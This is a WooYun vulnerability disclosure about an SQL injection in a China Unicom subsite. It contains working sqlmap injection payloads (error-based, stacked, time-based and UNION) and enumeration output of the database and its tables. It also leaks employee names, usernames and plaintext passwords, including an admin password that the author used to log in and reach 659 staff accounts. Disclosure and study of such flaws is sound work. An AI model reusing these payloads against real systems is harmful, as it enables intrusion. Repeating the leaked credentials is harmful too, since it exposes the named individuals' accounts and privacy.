当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153849

漏洞标题:运营商安全之联通某处处都是bug的分站SQL注入涉及大量个人信息

相关厂商:中国联通

漏洞作者: 李旭敏

提交时间:2015-11-18 11:29

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-18: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

bug比漏洞还多

详细说明:

注入点:

**.**.**.**/sqjl_loginchk.html?un=CasterJs&pw=CasterJs&number=0.6992921326309443


1.png

2.png

大量员工工号密码都出来了,还有其他运营部门的一些管理账号。

Database: daohang
Table: cmzy_user
[11 entries]
+--------------+--------------+
| cmzy_user_un | cmzy_user_pw |
+--------------+--------------+
| M114 | banbanMM13 |
| admin114 | eip12345 |
| xiaoliuvv | xiaoliuvvv |


Database: daohang
Table: dj114user
[4 entries]
+----------------+--------------------+--------------------+
| dj114user_name | dj114user_username | dj114user_password |
+----------------+--------------------+--------------------+
| 冯志勋 | fengzhixun | 111 |
| 林梅 | linmei | 111 |
| 张淑洁 | zhangshujie | 111 |
| 赵丽丽 | zhaolili | 111 |
+----------------+--------------------+--------------------+


拿到某管理账号,目测是销售经理的,账号admin,密码zl840611
登陆地址:**.**.**.**/sqjl.html
这里登陆有问题,不会主动跳转,根据注入漏洞表段名字(sqjl_ry),我尝试访问了
**.**.**.**/sqjl_ry.html

3.png

可以操作659名分公司员工以及管理的账号,并且可以初始化账号密码,初始化这里也有问题,只能通过抓包拿到返回结果,不会回显

4.png


5.png

不知道这个功能是否能对普通用户使用,我就不多做测试了。

漏洞证明:

Parameter: un (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: un=CasterJs' AND 1676=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1676=1676) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(120)+CHAR(113))) AND 'xvDx'='xvDx&pw=CasterJs&number=0.6992921326309443
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: un=CasterJs';WAITFOR DELAY '0:0:5'--&pw=CasterJs&number=0.6992921326309443
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: un=CasterJs' WAITFOR DELAY '0:0:5'--&pw=CasterJs&number=0.6992921326309443
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: un=CasterJs' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(117)+CHAR(97)+CHAR(102)+CHAR(82)+CHAR(70)+CHAR(117)+CHAR(113)+CHAR(79)+CHAR(76)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pw=CasterJs&number=0.6992921326309443
---
[11:43:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[11:43:55] [INFO] fetching database names
[11:43:55] [INFO] the SQL query used returns 5 entries
[11:43:55] [INFO] resumed: daohang
[11:43:55] [INFO] resumed: master
[11:43:55] [INFO] resumed: model
[11:43:55] [INFO] resumed: msdb
[11:43:55] [INFO] resumed: tempdb
available databases [5]:
[*] daohang
[*] master
[*] model
[*] msdb
[*] tempdb


Database: daohang
[44 tables]
+-------------------+
| Sheet1 |
| baixing |
| choujiang_jl |
| choujiang_lb |
| choujiangfw_log |
| cmzy_atdg_dingdan |
| cmzy_atdg_ydlist |
| cmzy_atdg_zy |
| cmzy_spmt_dingdan |
| cmzy_spmt_ydlist |
| cmzy_spmt_zydw |
| cmzy_spmt_zydw |
| cmzy_spmt_zyzt |
| cmzy_user |
| dj114 |
| dj114user |
| dtproperties |
| fw_log |
| ly |
| mtzy_dw |
| mtzy_fw |
| mtzy_hy |
| mtzy_user |
| mtzy_xzq |
| mtzy_ydlist |
| mtzy_ydlist |
| mtzy_zyzt |
| qcfw_wx |
| qcfw_wx |
| qcfw_xc |
| qcfw_yp |
| sqjl_bm |
| sqjl_cp |
| sqjl_fzkt |
| sqjl_fzkt |
| sqjl_fzlog |
| sqjl_ry |
| sqsc_cq |
| sqsc_list |
| v_mtzy_dw |
| v_mtzy_fw |
| v_mtzy_ydlist |
| v_sqjl_fz |
| yj2013 |
+-------------------+



修复方案:

版权声明:转载请注明来源 李旭敏@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-24 14:24

厂商回复:

CNVD未复现所述情况,暂未列入处置流程。

最新状态:

暂无